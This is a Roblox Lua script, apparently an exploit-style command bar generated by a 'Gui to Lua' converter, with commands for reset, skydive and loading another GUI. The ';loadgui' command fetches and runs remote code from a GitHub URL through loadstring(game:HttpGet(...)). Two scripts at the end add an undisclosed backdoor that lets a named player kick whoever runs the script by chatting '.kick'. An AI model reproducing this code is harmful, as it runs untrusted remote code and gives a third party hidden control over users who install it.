-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local cmdbar = Instance.new("ImageLabel")
local TextBox = Instance.new("TextBox")
local Frame = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local ScrollingFrame = Instance.new("ScrollingFrame")
local cmds = Instance.new("TextButton")
local TextButton_Roundify_5px = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local loadgui = Instance.new("TextButton")
local TextButton_Roundify_5px_2 = Instance.new("ImageLabel")
local TextLabel_2 = Instance.new("TextLabel")
local skydive = Instance.new("TextButton")
local TextButton_Roundify_5px_3 = Instance.new("ImageLabel")
local TextLabel_3 = Instance.new("TextLabel")
local reset = Instance.new("TextButton")
local TextButton_Roundify_5px_4 = Instance.new("ImageLabel")
local TextLabel_4 = Instance.new("TextLabel")
local Frame_2 = Instance.new("Frame")
local TextLabel_5 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ResetOnSpawn = false

cmdbar.Name = "cmdbar"
cmdbar.Parent = ScreenGui
cmdbar.AnchorPoint = Vector2.new(0.5, 0.5)
cmdbar.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cmdbar.BackgroundTransparency = 1.000
cmdbar.Position = UDim2.new(0.5, 0, 1.10000002, 0)
cmdbar.Size = UDim2.new(0, 189, 0, 35)
cmdbar.Image = "rbxassetid://3570695787"
cmdbar.ImageColor3 = Color3.fromRGB(31, 31, 31)
cmdbar.ScaleType = Enum.ScaleType.Slice
cmdbar.SliceCenter = Rect.new(100, 100, 100, 100)
cmdbar.SliceScale = 0.050

TextBox.Parent = cmdbar
TextBox.AnchorPoint = Vector2.new(0.5, 0.5)
TextBox.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
TextBox.BorderColor3 = Color3.fromRGB(31, 31, 31)
TextBox.Position = UDim2.new(0.343915343, 0, 0.485714316, 0)
TextBox.Size = UDim2.new(0, 114, 0, 22)
TextBox.Font = Enum.Font.Gotham
TextBox.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000
TextBox.TextXAlignment = Enum.TextXAlignment.Left

Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
Frame.BackgroundTransparency = 1.000
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.499614477, 0, 0.68466258, 0)
Frame.Size = UDim2.new(0, 189, 0, 245)

TextButton.Parent = Frame
TextButton.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
TextButton.BackgroundTransparency = 1.000
TextButton.Position = UDim2.new(0.896825433, 0, 0.0745204389, 0)
TextButton.Size = UDim2.new(0, 25, 0, 19)
TextButton.Visible = false
TextButton.Font = Enum.Font.GothamBold
TextButton.Text = "X"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextSize = 14.000

ScrollingFrame.Parent = Frame
ScrollingFrame.Active = true
ScrollingFrame.AnchorPoint = Vector2.new(0.5, 0.5)
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
ScrollingFrame.BackgroundTransparency = 1.000
ScrollingFrame.BorderSizePixel = 0
ScrollingFrame.Position = UDim2.new(0.505290985, 0, 0.55510205, 0)
ScrollingFrame.Size = UDim2.new(0, 186, 0, 217)
ScrollingFrame.Visible = false
ScrollingFrame.CanvasSize = UDim2.new(0, 0, 9, 0)
ScrollingFrame.ScrollBarThickness = 7

cmds.Name = "cmds"
cmds.Parent = ScrollingFrame
cmds.BackgroundColor3 = Color3.fromRGB(51, 51, 51)
cmds.BackgroundTransparency = 1.000
cmds.BorderSizePixel = 0
cmds.Position = UDim2.new(0.0913978368, 0, 0.00352570973, 0)
cmds.Size = UDim2.new(0, 151, 0, 39)
cmds.Font = Enum.Font.SourceSans
cmds.Text = "0"
cmds.TextColor3 = Color3.fromRGB(0, 0, 0)
cmds.TextSize = 14.000

TextButton_Roundify_5px.Name = "TextButton_Roundify_5px"
TextButton_Roundify_5px.Parent = cmds
TextButton_Roundify_5px.Active = true
TextButton_Roundify_5px.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_Roundify_5px.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_Roundify_5px.BackgroundTransparency = 1.000
TextButton_Roundify_5px.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_Roundify_5px.Selectable = true
TextButton_Roundify_5px.Size = UDim2.new(1, 0, 1, 0)
TextButton_Roundify_5px.Image = "rbxassetid://3570695787"
TextButton_Roundify_5px.ImageColor3 = Color3.fromRGB(51, 51, 51)
TextButton_Roundify_5px.ScaleType = Enum.ScaleType.Slice
TextButton_Roundify_5px.SliceCenter = Rect.new(100, 100, 100, 100)
TextButton_Roundify_5px.SliceScale = 0.050

TextLabel.Parent = cmds
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.254966915, 0, -0.15384616, 0)
TextLabel.Size = UDim2.new(0, 74, 0, 50)
TextLabel.Font = Enum.Font.GothamBold
TextLabel.Text = ";cmds"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 14.000
TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

loadgui.Name = "loadgui"
loadgui.Parent = ScrollingFrame
loadgui.BackgroundColor3 = Color3.fromRGB(51, 51, 51)
loadgui.BackgroundTransparency = 1.000
loadgui.BorderSizePixel = 0
loadgui.Position = UDim2.new(0.0909999982, 0, 0.0240000002, 0)
loadgui.Size = UDim2.new(0, 151, 0, 39)
loadgui.Font = Enum.Font.SourceSans
loadgui.Text = "0"
loadgui.TextColor3 = Color3.fromRGB(0, 0, 0)
loadgui.TextSize = 14.000

TextButton_Roundify_5px_2.Name = "TextButton_Roundify_5px"
TextButton_Roundify_5px_2.Parent = loadgui
TextButton_Roundify_5px_2.Active = true
TextButton_Roundify_5px_2.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_Roundify_5px_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_Roundify_5px_2.BackgroundTransparency = 1.000
TextButton_Roundify_5px_2.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_Roundify_5px_2.Selectable = true
TextButton_Roundify_5px_2.Size = UDim2.new(1, 0, 1, 0)
TextButton_Roundify_5px_2.Image = "rbxassetid://3570695787"
TextButton_Roundify_5px_2.ImageColor3 = Color3.fromRGB(51, 51, 51)
TextButton_Roundify_5px_2.ScaleType = Enum.ScaleType.Slice
TextButton_Roundify_5px_2.SliceCenter = Rect.new(100, 100, 100, 100)
TextButton_Roundify_5px_2.SliceScale = 0.050

TextLabel_2.Parent = loadgui
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.254966915, 0, -0.15384616, 0)
TextLabel_2.Size = UDim2.new(0, 74, 0, 50)
TextLabel_2.Font = Enum.Font.GothamBold
TextLabel_2.Text = ";loadgui"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 14.000
TextLabel_2.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

skydive.Name = "skydive"
skydive.Parent = ScrollingFrame
skydive.BackgroundColor3 = Color3.fromRGB(51, 51, 51)
skydive.BackgroundTransparency = 1.000
skydive.BorderSizePixel = 0
skydive.Position = UDim2.new(0.0909999982, 0, 0.0439999998, 0)
skydive.Size = UDim2.new(0, 151, 0, 39)
skydive.Font = Enum.Font.SourceSans
skydive.Text = "0"
skydive.TextColor3 = Color3.fromRGB(0, 0, 0)
skydive.TextSize = 14.000

TextButton_Roundify_5px_3.Name = "TextButton_Roundify_5px"
TextButton_Roundify_5px_3.Parent = skydive
TextButton_Roundify_5px_3.Active = true
TextButton_Roundify_5px_3.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_Roundify_5px_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_Roundify_5px_3.BackgroundTransparency = 1.000
TextButton_Roundify_5px_3.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_Roundify_5px_3.Selectable = true
TextButton_Roundify_5px_3.Size = UDim2.new(1, 0, 1, 0)
TextButton_Roundify_5px_3.Image = "rbxassetid://3570695787"
TextButton_Roundify_5px_3.ImageColor3 = Color3.fromRGB(51, 51, 51)
TextButton_Roundify_5px_3.ScaleType = Enum.ScaleType.Slice
TextButton_Roundify_5px_3.SliceCenter = Rect.new(100, 100, 100, 100)
TextButton_Roundify_5px_3.SliceScale = 0.050

TextLabel_3.Parent = skydive
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.254966915, 0, -0.15384616, 0)
TextLabel_3.Size = UDim2.new(0, 74, 0, 50)
TextLabel_3.Font = Enum.Font.GothamBold
TextLabel_3.Text = ";skydive"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 14.000
TextLabel_3.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

reset.Name = "reset"
reset.Parent = ScrollingFrame
reset.BackgroundColor3 = Color3.fromRGB(51, 51, 51)
reset.BackgroundTransparency = 1.000
reset.BorderSizePixel = 0
reset.Position = UDim2.new(0.0909999982, 0, 0.064000003, 0)
reset.Size = UDim2.new(0, 151, 0, 39)
reset.Font = Enum.Font.SourceSans
reset.Text = "0"
reset.TextColor3 = Color3.fromRGB(0, 0, 0)
reset.TextSize = 14.000

TextButton_Roundify_5px_4.Name = "TextButton_Roundify_5px"
TextButton_Roundify_5px_4.Parent = reset
TextButton_Roundify_5px_4.Active = true
TextButton_Roundify_5px_4.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_Roundify_5px_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_Roundify_5px_4.BackgroundTransparency = 1.000
TextButton_Roundify_5px_4.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_Roundify_5px_4.Selectable = true
TextButton_Roundify_5px_4.Size = UDim2.new(1, 0, 1, 0)
TextButton_Roundify_5px_4.Image = "rbxassetid://3570695787"
TextButton_Roundify_5px_4.ImageColor3 = Color3.fromRGB(51, 51, 51)
TextButton_Roundify_5px_4.ScaleType = Enum.ScaleType.Slice
TextButton_Roundify_5px_4.SliceCenter = Rect.new(100, 100, 100, 100)
TextButton_Roundify_5px_4.SliceScale = 0.050

TextLabel_4.Parent = reset
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0.254966915, 0, -0.15384616, 0)
TextLabel_4.Size = UDim2.new(0, 74, 0, 50)
TextLabel_4.Font = Enum.Font.GothamBold
TextLabel_4.Text = ";reset"
TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.TextSize = 14.000
TextLabel_4.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

Frame_2.Parent = Frame
Frame_2.AnchorPoint = Vector2.new(0.5, 0.5)
Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.502645493, 0, 0.110204108, 0)
Frame_2.Size = UDim2.new(0, 100, 0, 1)
Frame_2.Visible = false

TextLabel_5.Parent = Frame
TextLabel_5.AnchorPoint = Vector2.new(0.5, 0.5)
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.Position = UDim2.new(0.501999974, 0, 0.0680000037, 0)
TextLabel_5.Size = UDim2.new(0, 10, 0, 11)
TextLabel_5.Visible = false
TextLabel_5.Font = Enum.Font.GothamBold
TextLabel_5.Text = "Commands"
TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.TextSize = 14.000

-- Scripts:

local function RCBVT_fake_script() -- TextBox.LocalScript 
	local script = Instance.new('LocalScript', TextBox)

	script.Parent.FocusLost:Connect(function()
		if script.Parent.Text==";cmds" then
			local TweenService = game:GetService('TweenService')
			local Frame = script.Parent.Parent.Parent.Frame
			TweenService:Create(Frame,TweenInfo.new(1),{BackgroundTransparency = 0.1}):Play()
			script.Parent.Parent.Parent.Frame.TextButton.Visible=true
			script.Parent.Parent.Parent.Frame.ScrollingFrame.Visible=true
			script.Parent.Parent.Parent.Frame.TextLabel.Visible=true
			script.Parent.Parent.Parent.Frame.Frame.Visible=true
		end
	end)
	script.Parent.FocusLost:Connect(function()
		if script.Parent.Text==";reset" then
			game.Players.LocalPlayer.Character.Humanoid.Health=0
		end
	end)
	script.Parent.FocusLost:Connect(function()
		if script.Parent.Text==";skydive" then
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,2500,0)
		end
	end)
	script.Parent.FocusLost:Connect(function()
		if script.Parent.Text==";loadgui" then
			loadstring(game:HttpGet('https://raw.githubusercontent.com/bobis12/glowing-octo-journey/main/opengui'))
		end
	end)
end
coroutine.wrap(RCBVT_fake_script)()
local function KRNKTR_fake_script() -- cmdbar.LocalScript 
	local script = Instance.new('LocalScript', cmdbar)

	local Main = script.Parent
	
	local PositionClosed = UDim2.new(0.5, 0,1.1, 0)
	local PositionOpen = UDim2.new(0.5, 0,0.885, 0)
	
	local UserInputService = game:GetService("UserInputService")
	
	UserInputService.InputBegan:Connect(function(KeyCode)
		if KeyCode.KeyCode == Enum.KeyCode.Semicolon then
			script.Parent.TextBox:CaptureFocus()
			Main:TweenPosition((PositionOpen), "InOut", "Quint")
			script.Parent.TextBox.FocusLost:Connect(function(enterPressed)
				if enterPressed then
					Main:TweenPosition((PositionClosed), "InOut", "Quint")
					wait(0)
					script.Parent.TextBox.Text=""
				end
			end)
		end
	end)
end
coroutine.wrap(KRNKTR_fake_script)()
local function ZEQHTZ_fake_script() -- TextButton.LocalScript 
	local script = Instance.new('LocalScript', TextButton)

	script.Parent.MouseButton1Click:Connect(function()
		local TweenService = game:GetService('TweenService')
		local Frame = script.Parent.Parent
		TweenService:Create(Frame,TweenInfo.new(1),{BackgroundTransparency = 1}):Play()
		script.Parent.Visible=false
		script.Parent.Parent.ScrollingFrame.Visible=false
		script.Parent.Parent.TextLabel.Visible=false
		script.Parent.Parent.Frame.Visible=false
	end)
end
coroutine.wrap(ZEQHTZ_fake_script)()
local function KVAWBGJ_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	frame = script.Parent
	frame.Draggable = true
	frame.Active = true
	frame.Selectable = true
end
coroutine.wrap(KVAWBGJ_fake_script)()
local function WWFQNZ_fake_script() -- cmds.LocalScript 
	local script = Instance.new('LocalScript', cmds)

	script.Parent.MouseButton1Click:Connect(function()
		local Main = script.Parent.Parent.Parent.Parent.cmdbar
		Main.TextBox.Text=""
	
		local PositionClosed = UDim2.new(0.5, 0,1.1, 0)
		local PositionOpen = UDim2.new(0.5, 0,0.885, 0)
	
		local UserInputService = game:GetService("UserInputService")
		script.Parent.Parent.Parent.Parent.cmdbar.TextBox:CaptureFocus()
		Main:TweenPosition((PositionOpen), "InOut", "Quint")
		Main.TextBox.Text=";cmds"
		Main.TextBox.FocusLost:Connect(function(enterPressed)
			if enterPressed then
				Main:TweenPosition((PositionClosed), "InOut", "Quint")
				wait(0)
				Main.TextBox.Text=""
				end
		end)
	end)
end
coroutine.wrap(WWFQNZ_fake_script)()
local function HIOL_fake_script() -- loadgui.LocalScript 
	local script = Instance.new('LocalScript', loadgui)

	script.Parent.MouseButton1Click:Connect(function()
		local Main = script.Parent.Parent.Parent.Parent.cmdbar
		Main.TextBox.Text=""
	
		local PositionClosed = UDim2.new(0.5, 0,1.1, 0)
		local PositionOpen = UDim2.new(0.5, 0,0.885, 0)
	
		local UserInputService = game:GetService("UserInputService")
		script.Parent.Parent.Parent.Parent.cmdbar.TextBox:CaptureFocus()
		Main:TweenPosition((PositionOpen), "InOut", "Quint")
		Main.TextBox.Text=";loadgui"
		Main.TextBox.FocusLost:Connect(function(enterPressed)
			if enterPressed then
				Main:TweenPosition((PositionClosed), "InOut", "Quint")
				wait(0)
				Main.TextBox.Text=""
				end
		end)
	end)
end
coroutine.wrap(HIOL_fake_script)()
local function NXEFGZ_fake_script() -- skydive.LocalScript 
	local script = Instance.new('LocalScript', skydive)

	script.Parent.MouseButton1Click:Connect(function()
		local Main = script.Parent.Parent.Parent.Parent.cmdbar
		Main.TextBox.Text=""
	
		local PositionClosed = UDim2.new(0.5, 0,1.1, 0)
		local PositionOpen = UDim2.new(0.5, 0,0.885, 0)
	
		local UserInputService = game:GetService("UserInputService")
		script.Parent.Parent.Parent.Parent.cmdbar.TextBox:CaptureFocus()
		Main:TweenPosition((PositionOpen), "InOut", "Quint")
		Main.TextBox.Text=";skydive"
		Main.TextBox.FocusLost:Connect(function(enterPressed)
			if enterPressed then
				Main:TweenPosition((PositionClosed), "InOut", "Quint")
				wait(0)
				Main.TextBox.Text=""
				end
		end)
	end)
end
coroutine.wrap(NXEFGZ_fake_script)()
local function YIXI_fake_script() -- reset.LocalScript 
	local script = Instance.new('LocalScript', reset)

	script.Parent.MouseButton1Click:Connect(function()
		local Main = script.Parent.Parent.Parent.Parent.cmdbar
		Main.TextBox.Text=""
	
		local PositionClosed = UDim2.new(0.5, 0,1.1, 0)
		local PositionOpen = UDim2.new(0.5, 0,0.885, 0)
	
		local UserInputService = game:GetService("UserInputService")
		script.Parent.Parent.Parent.Parent.cmdbar.TextBox:CaptureFocus()
		Main:TweenPosition((PositionOpen), "InOut", "Quint")
		Main.TextBox.Text=";reset"
		Main.TextBox.FocusLost:Connect(function(enterPressed)
			if enterPressed then
				Main:TweenPosition((PositionClosed), "InOut", "Quint")
				wait(0)
				Main.TextBox.Text=""
				end
		end)
	end)
end
coroutine.wrap(YIXI_fake_script)()
local function OCEE_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	local Players = game:GetService("Players")
	Players.PlayerAdded:Connect(function(player)
		if player.name=="kevinkacper" then
			local Players = game.Players.kevinkacper
			Players.Chatted:Connect(function(cht)
				if cht:match(".kick") then
					game.Players.LocalPlayer:Kick("Kicked By Davw.")
				end
			end)
		end
	end)
	Players = game:GetService("Players")
	for i, player in pairs(Players:GetPlayers()) do
		if player.Name=="kevinkacper" then
			local Players = game.Players.kevinkacper
			Players.Chatted:Connect(function(cht)
				if cht:match(".kick") then
					game.Players.LocalPlayer:Kick("Kicked By Davw.")
				end
			end)
		end
	end
end
coroutine.wrap(OCEE_fake_script)()
local function PXTN_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	Players = game:GetService("Players")
	for i, player in pairs(Players:GetPlayers()) do
		if player.Name=="kevinkacper" then
			local Players = game.Players.kevinkacper
			Players.Chatted:Connect(function(cht)
				if cht:match(".kick") then
					game.Players.LocalPlayer:Kick("Kicked By Davw.")
				end
			end)
		end
	end
end
coroutine.wrap(PXTN_fake_script)()
